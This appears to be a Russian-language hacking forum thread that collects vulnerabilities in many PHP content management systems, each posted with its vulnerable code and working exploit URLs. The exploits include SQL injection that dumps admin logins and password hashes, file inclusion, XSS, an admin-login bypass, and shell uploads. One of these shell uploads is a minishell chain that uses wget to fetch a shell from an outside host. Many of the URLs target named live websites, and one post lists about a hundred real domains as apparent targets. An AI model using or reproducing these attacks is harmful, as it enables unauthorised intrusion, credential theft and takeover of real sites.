iGamingCMS1.5 SQL Файл reviews.php PHP: $review = $db->Execute(" SELECT * FROM `sp_reviews` WHERE sp_reviews.id = '{$_REQUEST['id']}';"); __http://www.xboxelite.co.uk/reviews.php?do=view&id=-174'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13+--+ _http://www.xboxelite.co.uk/reviews.php?do=view&id=-174'+union+select+1,concat_ws(0x3a,PSEUDO,pass),3,4,5,6,7,8,9,10,11,12,13+from+sp_members+--+ ЗЫ префикс у них sp_ Blind-sql Файл gamedetails.php PHP: $result = $db->Execute("SELECT * FROM `sp_games` WHERE `id` = '$_REQUEST[id]' LIMIT 1"); __http://www.patches-scrolls.info/gamedetails.php?id=1+and+substring(version(),1,1)=5 PS там еще есть фалики с типа таким же запросом RFI/shell в админке Файл loadplugin.php PHP: require_once("$_REQUEST[load]"); необходимо allow_url_include = on MQ= off http://127.0.0.1/iGamingCMS1.5/admin/loadplugin.php?load=http://shell.txt? 2) способ залития шелла Файл template_editor.php PHP: if ($myfilehandle=@fopen('../templates/' . $_REQUEST['filename'],'w')) { if (get_magic_quotes_gpc()) { $editbuffer = stripslashes($editbuffer); } fputs($myfilehandle,$editbuffer); fclose($myfilehandle); echo "Saved OK"; по сути http://127.0.0.1/iGamingCMS1.5/admin/template_editor.php там дается на выбор файлы из папки templates, но помоему нам ни чего не мешает выйти)из нее http://127.0.0.1/iGamingCMS1.5/admin/template_editor.php?filename=../index.php (ну или в один из инклудившихся файлов писать код) и в дальнейшем пишем пыщ пыщ код))) или тупо код шелла
PHMe LFI файл www.php PHP: $currentFile = 'www.php'; require_once('con-fig/site_info.php'); require_once('con-fig/theme_info.php'); require_once("themes/{$Tdir}/top.php"); require_once('resources/function_list.php'); require_once("themes/{$Tdir}/bottom.php"); Файл resources/function_list.php PHP: require('resources/mod/'.$_GET['action'].'.php'); http://localhost/phme/www.php?action=../../admin~/untitled
iXon CMS SQL Уже по ходу любимый файл Rss.php PHP: ... $id = $_GET['id']; $post_data = get_all_post_data($id); .. $result = mysql_query("SELECT * FROM comments WHERE post_id = $id ORDER BY comment_date ASC"); while ($comments = mysql_fetch_array($result)) ...?> http://localhost/iXon_CMS%200.30%20Beta/rss.php?id=1+union+select+1,2,3,4,5,6,7,unhex(hex(version())),9,10-- ну и вроде в инете видел что было выложено LFI банальное раскрытие путей как с htmlspecialchars PHP: $redirect = 'login-control.php?redirect_to='.urlencode($_GET['redirect_to']); http://localhost/iXon_CMS%200.30%20Beta/ixon-admin/login.php?redirect_to[]=
Set-CMS Оффициальная страничка Активная XSS Модуль гостевая книга PHP: if ($mc == "ok") { $title = "Сохранение сообщения"; if (isset($_COOKIE['flood_feedback'])) {$er[] = "Флуд-защита.Подождите некоторое время...";} if (isset($_POST['user_name'])){setcookie("user_name", $_POST['user_name'], time()+333333333);} if (isset($_POST['user_email'])){setcookie("user_email", $_POST['user_email'], time()+333333333);} if (isset($_POST['user_icq'])){setcookie("user_icq", $_POST['user_icq'], time()+333333333);} if (isset($_SESSION[$uniqueid.'name_admin'])){$_POST['user_name'] = $_SESSION[$uniqueid.'name_admin'];} if (isset($_SESSION[$uniqueid.'email_admin'])){$_POST['user_email'] = $_SESSION[$uniqueid.'email_admin'];} if (isset($_SESSION[$uniqueid.'icq_admin'])){$_POST['user_icq'] = $_SESSION[$uniqueid.'icq_admin'];} $text_gb = saveuser($_POST['user_text']); $name = saveuser($_POST['user_name']); $email = saveuser($_POST['user_email']); $icq = saveuser($_POST['user_icq']); $code = $_POST['code']; if ($code == "") { $er[] = "Нет кода!"; } $ffile = file("files/feedback.set"); for($a=0;$a<count($ffile);$a++) { $ee = explode("<>", $ffile[$a]); if ($ee[5] == $code) { $er[] = "Флудишь,мля!Отправлено только одно сообщение"; } } В поле "Ваше имя" вставляем Эта же бага встречается в комментариях к новостям. Тоже поле имя. Раскрытие путей Раскрытие путей с помощью PHPSESSID Думаю обьяснения не нужны. Пассивная XSS
iManga_v0.3 SQL Файл showcomments.php PHP: $postid = $_GET['postid']; $post = mysql_query("SELECT * FROM `" . $global['prefix'] . "news` WHERE id=" . $postid); $post = mysql_fetch_array($post); http://localhost/iManga_v0.3/upload/showcomments.php?postid=-1+union+select+1,version(),3,4,5-- http://localhost/iManga_v0.3/upload/showcomments.php?postid=-1+union+select+1,concat_Ws(0x3a,username,password),3,4,5+from+users-- ЗАливка шелла в админке http://localhost/iManga_v0.3/upload/admin/postcomic.php PHP: $target_path = "../comics/" . basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $target_path)) {echo "<strong>The comic was successfully uploaded.</strong>\n<br /><br />"; http://localhost/iManga_v0.3/upload/comics/shell.php
Clicknet_CMS_v2.1 Чтение файлов MQ=off register_globals= on Файл menu.php PHP: <?php $menufil = $_SERVER["DOCUMENT_ROOT"] . $lokal . "menus/$indhold[2].php"; $menuitems = file($menufil); http://localhost/Clicknet_CMS_v2.1/plugins/menu.php?lokal=/путь/до/файла/admin/htpasswd LFI Файл index.php MQ=off register_globals= on PHP: ... $lokal = $content; } else { $lokal = "/"; } ... include($_SERVER["DOCUMENT_ROOT"] . $lokal . "count.php"); http://localhost/Clicknet_CMS_v2.1/index.php?content=/путь/до/файла%00 Файл head.php PHP: if ($indhold[2]) { echo "<td width=\"150\" valign=\"top\">\n"; include($_SERVER["DOCUMENT_ROOT"] . $lokal . "plugins/menu.php"); echo "</td>\n"; http://localhost/Clicknet_CMS_v2.1/head.php?indhold[2]=1&lokal=/путь/до/файла%00 Файл foot.php PHP: include($_SERVER["DOCUMENT_ROOT"] . $lokal . "sys/fodnote.php"); http://localhost/Clicknet_CMS_v2.1/foot.php?lokal=/путь/до/файла%00
ZAKRZAK LFI Файл index.php PHP: include('include/init.php'); Файл init.php PHP: if ($_SESSION['lang']) $lang=$_SESSION['lang']; if ($_GET['lang']) $lang=$_GET['lang']; if (!$lang) { $lang=$usr_prefs['lang']; } $_SESSION['lang']=$lang; include('langs/'.$lang.'.php'); http://localhost/zakrzak-0.01/index.php?lang=../../test
В теме есть часть информации по нижеследующему, но не так подробно: Sad Raven Guest Book <=v1.3 Она же sr guest. Вход в админ панель: Code: <?php if (!isset($alogin) || md5($pass) != $Password[$alogin] || !isset($Password[$alogin])) ?> 1. Админка находится по адресу: http://site.com/guest/admin.php 2. Зайти можно с таким запросом (условие - register globals=on): Code: http://site.com/guest/admin.php?pass=3105&alogin=3105&Password[3105]=37e7897f62e8d91b1ce60515829ca282 3105 - цифра от балды, а 37e7897f62e8d91b1ce60515829ca282 - это md5(3105) но мы пока не админы, т.к. в админку пустило, но при попытке выполнить какие-либо действия в админке нас опять выкидывает на залогивание, смотрим: 1. После перехода по ссылке выше у нас появятся две куки: Code: Имя: alogin Содержимое: 3105 Узел: site.com Путь: /guest/ Имя: pass Содержимое: 3105 Узел: site.com Путь: /guest/ к которым надо будет добавить третью (через тот же плагин для FF cookie editor): Code: Имя: Password[3105] Содержимое: 37e7897f62e8d91b1ce60515829ca282 Узел: site.com Путь: /guest/ и вот тогда мы уже полноценные админы 2. Заливка шелла: - Идем в http://site.com/guest/admin.php?design - Правим footer.inc.php - вставляем Code: <?php eval(stripslashes($_GET[e]));?> для 100% уверенности, обходим magic_quotes=ON 3. проверяем: http://site.com/guest/index.php?e=phpinfo(); 4. Льем шелл. ==================================== fckeditor <=2.2 возможны версии чуть выше: dork: inurl:dialog/fck_about.html Раскрытие пути заливки файла: 1. Идем по адресу - editor/filemanager/browser/default/connectors/test.html может отличаться, всегда поймете что искать идя от корня (если доступен просмотр папок с веба) 2. Выставляем Connector: - PHP 3. Жмем "Get Folders and Files" - появляется примерно такое среди всего прочего: что есть абсолютный путь куда будут заливаться файлы относительно корня сайта, она же папка, доступная на запись. Залитие шелла: 1. Connector: - PHP 2. Переименовываем шелл (например wso2.php) в wso2.php.xss - т.е. на конце задаем несуществующее расширение файла. 3. Заливаем 4. Переходим по ссылке (исходя из примера выше): http://site.com/config/_uploads/File/wso2.php.xss и всё, у вас полноценный шелл бонус: в очень многих даже пропатченных и современных версиях fceditor все равно есть уязвимости, например раскрытие асболютного пути сервера, если заливать корректный тип файла, но в поле "Current Folder" подставить что-то вроде: ini.php%00 часто вываливается ошибка записи из tmp-директории с полным путем к управляющему скрипту PS: fceditor используется в большинстве CMS - редактирование новости, загрузка картинок, редактирование страниц - всё он практически, полный путь к fceditor можно узнать попытавшись вставить картинку в тело новости и нажать на то, что сверху в этом окошке, типо title - открывается веб-путь к fceditor. Проверить версию (пример) - Code: http://topkredite.ch/_admin/_system/htmleditor/editor/dialog/fck_about.html
seo тулза TextMaker от SibirDesign 2008 SibirDesign AllRightReserved 2008 наверное, пользы от этого сообщения будет мало, но все равно выложу)) =================== LFI magic_quotes = off PHP: /index.php ... include("login.php"); ... switch ($_GET['cmd']) { case "config": ... case "block": $sym=array("q","w","e","r","t","y","u","i","o","p","a","s","d","f","g","h","j","k","l","z","x","c","v","b","n","m"); $sym2=array("Q","W","E","R","T","Y","U","I","O","P","A","S","D","F","G","H","J","K","L","Z","X","C","V","B","N","M"); $_GET['type']=str_replace($sym2,$sym,$_GET['type']); $_GET['use']=str_replace($sym2,$sym,$_GET['use']); include("block/".$_GET['type']."/".$_GET['use'].".php"); break; ... PHP: /login.php ... if(($_GET['cmd']!="block")and($_GET['type']!='export')and($_GET['use']!='rss')){ if(isset($_POST['login']) and isset($_POST['password'])){ $_SESSION['login']=$_POST['login']; $_SESSION['password']=$_POST['password']; } if(($_SESSION['login']!=$_auto['login'])or($_SESSION['password']!=$_auto['password'])){ include("form/login.htm"); exit(); } } ... exploit: http://textmaker/?cmd=block&use=rss&type=../sql.txt%00 ==================== SQL-injection magic_quotes = off PHP: /index.php ... как и при LFI. Но не меняя параметров $_GET['type'] и $_GET['use'] инклудится файл block\export\rss.php ... PHP: /block/export/rss.php ... if(@$_GET['done']!='yes'){ ... }else{ header("Content-Type: text/xml; charset=utf-8"); $sql3="SELECT * FROM `project` WHERE `id` LIKE '".@$_GET['viewid']."'"; $result1 = $db->sql_query($sql3); $project=$db->sql_fetchrow($result1); $sql3="SELECT * FROM `text` WHERE `idproject` LIKE '".@$_GET['viewid']."'"; $result1 = $db->sql_query($sql3); $num=$db->sql_numrows($result1); ... exploit: http://textmaker/index.php?cmd=block&type=export&use=rss&done=yes&viewid=1%27+union+select+1,2,concat_ws(0x20,user(),database(),version(),@@basedir,@@datadir,@@tmpdir,@@version_compile_os),4,5,6,7,8,9,10,11+--%20- в исходнике <link>root@localhost textmaker 5.0.45-community-nt \usr\local\mysql5\ \usr\local\mysql5\data\ /tmp Win32</link>
Название: Mi-Dia Blog Автор: Christopher Shaw Адресс оффициальной странички: http://www.mi-dia.co.uk/ Активная XSS. В комментариях к записям блога.
Doop CMS 1.3.7 LFI Оффсайт: http://doop.infoauxis.com/ Для загразки почему то доступна только эта версия, предыдущих я не нашел. Сама CMS достаточно проста, имеет всего навсего один скрипт. Уязвимый код: Code: if (!isset($_REQUEST['page'])){ $_REQUEST['page']=$homepage; $cpage=$_REQUEST['page']; } else { $cpage=$_REQUEST['page']; } ... if ($admin == FALSE && !isset($_SESSION['name']) || isset($_REQUEST['preview'])){ if (file_exists("pages/".$cpage.".htm")){ include("pages/".$cpage.".htm"); } else include("pages/".$cpage.".html"); } Разработчики хоть и попытались "защититься" с помощю file_exists() и указанием папки, но совершенно забыли о фильтрации передаваемых значений. Эксплатация: Code: http://localhost/cmss/index.php?page=../../../../file%00
Пермь - разработчик datakit сайт разработчика -http://datakit.ru/ уязвимость - sql injection table - sys_users (user_login,user_password) admin panel - http://localhost/admin/logon/index.html Примеры - Code: http://www.peugeot-perm.ru/main/index.html?id=192&nid=148/**/and/**/1=2/**/union/**/all/**/select/**/1,concat(user_login,0x3a,user_password),3,4,5,6,7/**/from/**/sys_users Code: http://www.spass.perm.ru/main/index.html?id=6&nid=88/**/and/**/1=2/**/union/**/all/**/select/**/1,2,concat(user_login,0x3a,user_password),3,4,5,6/**/from/**/sys_users сайты принадлежащие датакит Code: 12v.perm.ru 303030.ru 59.gibdd.ru abperm.ru abs59.ru arsenal-perm.ru auto.perm.tv avocado-perevod.ru beltprom.ru bestcreditcard.ru bestcreditcards.ru bigbr.ru black-bar.ru chusovoy.ru clubxl.ru comcars.ru comedy.perm.ru crystalltech.ru datakit.ru dav-auto.ru echo.perm.ru ecotr.ru edwardsgym.ru eksformat.ru empireguru.ru eng.trophy59.perm.ru ermak.ru flashdj.ru forstroy.ru gagner.perm.ru gibdd.perm.ru globasclub.ru globassclub.ru goodwillperm.ru if-detstvo1.ru if-zaschita.ru kgbpro.ru kislorodclub.ru komcars.ru kuzov59.ru lemax.tv malmass.ru mashtab-stroy.ru mebelpolonii.ru medpipe.ru megastarperm.ru migom.perm.ru new-ground.ru nravitso.ru on-line.perm.ru online59.ru pecpl.ru pnevmatic.ru portacafe.ru positiveline.ru printhall.ru ptsm.perm.ru royalfm.ru shoutaim.ru skclassic.ru spk-nhs.ru staratovich.ru stfc.ru stolica-perm.ru swedengroup.ru syava.net taan.ru timontii.ru timontii.shoutaim.ru toyota-verratmn.ru toyota59.ru uitc.ru vektor.perm.ru verra-tyumen.ru vs01.datakit.ru www.abs59.ru www.alexiy.ru www.armsbp.ru www.audit-kontrakt.ru www.bionica-club.ru www.bionicaclub.com www.clubxl.ru www.crazylove.perm.ru www.dav-auto.ru www.dveregrad.ru www.edwardsgym.ru www.ekskargo.ru www.en.skclassic.ru www.ermak.ru www.gsi-pngs.ru www.honda59.ru www.new-ground.ru www.nissan-tmn.ru www.on-line.perm.ru www.permdomo.ru www.peugeot-perm.ru www.plazaolympia.ru www.portacafe.ru www.shoutaim.ru www.spass.perm.ru www.tk.perm.ru www.toyota59.ru www.trophy59.perm.ru www.ural-venture.ru www.vektor.perm.ru zurs.ru (c) x60unu
Программа: Quon Database Management Описание: недостаточная фильтрация входяших данных, sql injection & xss Уязвимый код: moviepage.php Code: $query = "SELECT * FROM movie WHERE id=" . $_GET['id']; $result = @mysql_query($query); exploit: www.example.com/moviepage.php?id=1+union+select+1,2,3,4,5,concat_ws(0x3a,email,password,admin),7,8+from+users barcode.php Code: $query = "SELECT * FROM movie WHERE id=" . $_GET['id']; $result = @mysql_query($query); $row = @mysql_fetch_array($result); exploit: www.example.com/barcode.php?id=-1+union+select+email,2,password,4,5,6,7,8+from+users checkin.php Code: <INPUT TYPE="text" name="check" id="check" value="<?php echo $getid;?>"> exploit:www.example.com/checkout.php?id=1%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E exploit:www.example.com/checkin.php?id=xss%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E ©trumpcode.org
Ananta_Gazelle 1.0 Раскрытие путей Code: http://localhost/anata/search.php?lookup[]=ololo Pasive XSS Уязвимый код: Code: $pagetitle = "Search"; $lookup = ""; if (isset($_GET) && isset($_GET["lookup"]) && $_GET["lookup"]) { $pagetitle .= " for ".$_GET["lookup"]; $lookup = $_GET["lookup"]; } else { $lookup = ""; } Как видно, передаваемый GET'ом парамерт lookup не фифильтруется. Эксплатация: Code: http://localhost/anata/search.php?lookup="><script>alert()</script> Вторая пасивная XSS в скрипте user.php Уязвимый код: Code: if (isset($_GET) && isset($_GET["user"]) && $_GET["user"]) { $pagetitle .= " for ".$_GET["user"]; } Та же картина. Эксплатация: Code: http://localhost/anata/user.php?user="><script>alert()</script> Но от XSS'ок толку нету, так как движок не работает с куками Так что это с чисто познавательной целью. P.S: там еще есть что то пожожее на инъекцию в insert запросе, но сейчас времени мало. Если выжму с не что то - выложу
CMS Faethon v 2.0.4 SQL injection && Active XSS Вreetz: Red_red1 && ElteRUS Скрипт autor.php Уязвимый код: PHP: ... elseif(isset($_GET['name'])) { $result=sql_query("SELECT id, name FROM ".$SQL_PREFIX."_authors WHERE item = '" . $_GET['name'] . "';"); } ... Передаваемый GET'ом параметр name не фильтруеться. Эксплатация: Code: http://localhost/bug/author.php?name=vasua'/**/and/**/substring(version(),1,1)=5/**/and/**/'1'='1 скритп info.php PHP: $result=sql_query("SELECT title, text FROM ".$SQL_PREFIX."_html_sections WHERE address = '" . $_GET['item'] . "';"); Эксплатация: Code: http://localhost/bug/info.php?item=-1'[COLOR=Yellow][SQL][/COLOR] XSS: Уязвимый код: PHP: ... $author = $_POST['author']; $email = $_POST['email']; $web = $_POST['web']; $subject = $_POST['subject']; ... Эксплатация: В комментах: Code: "><script>alert()</script>
SkaDate social networking software Code: http://com.skadate.com dork: "SkaDate social networking software" filetype:php Уязвим параметр language_id=[LFI], запоминается в куках. /inc/class.language.php PHP: function Language() { if( $_GET['language_id'] ) { $this->curr_lang_id = $_GET['language_id']; setcookie( 'language_id', $_COOKIE['language_id'], time()-1, PATH_HOME ); setcookie( 'language_id', $_GET['language_id'], time()+2592000, PATH_HOME ); } elseif( $_COOKIE['language_id'] ) { $this->curr_lang_id = $_COOKIE['language_id']; } else { $this->curr_lang_id = getConfig( 'def_lang_id' ); } Находим инклуд http://www.exoticity.net/privacy.php?language_id=../../../../../../etc/passwd%00 Смотрим куки, интересует параметр skadate_sessid, видим md5, к примеру 08fc79f504eb70c4c6b769e62831f494. Ищем сессию в /tmp/. http://www.exoticity.net/privacy.php?language_id=../../../../../../tmp/sess_08fc79f504eb70c4c6b769e62831f494%00 Если не угадали, находим php.ini и смотрим, куда сохраняется сессия, аналогично инклудим ее. Теперь сессия запомнилась в куках и инклудится на экран. Льем минишелл в сессию http://www.exoticity.net/member/online_list.php?pg=<?if($_GET[pass])system($_GET[pass]);?> Выполняем команду и льем минишелл для следующей команды http://www.exoticity.net/member/sign_in.php?pg=<?if($_GET[pass])system($_GET[pass]);?>&pass=ls .. -lia;id Открываем исходный код странички (форматирование не нарушено), видим наши права в системе, доступные на запись каталоги. Абсолютный путь тоже виден, льем шелл. http://www.exoticity.net/member/sign_in.php?pg=<?if($_GET[pass])system($_GET[pass]);?>&&pass=wget http://site/shell.txt -O /home/exoticit/public_html/images/shell.php ======= Примеры: http://forum.antichat.ru/showpost.php?p=1595768&postcount=990
PHP-Fusion Bug:SQL inkection Exploit: http://site.com/[path]/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,user_name,4,5,6,7+from+security_users-- Code: http://recipe.jones-net.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,user_name,4,5,6,7+from+security_users-- выводит в Comments
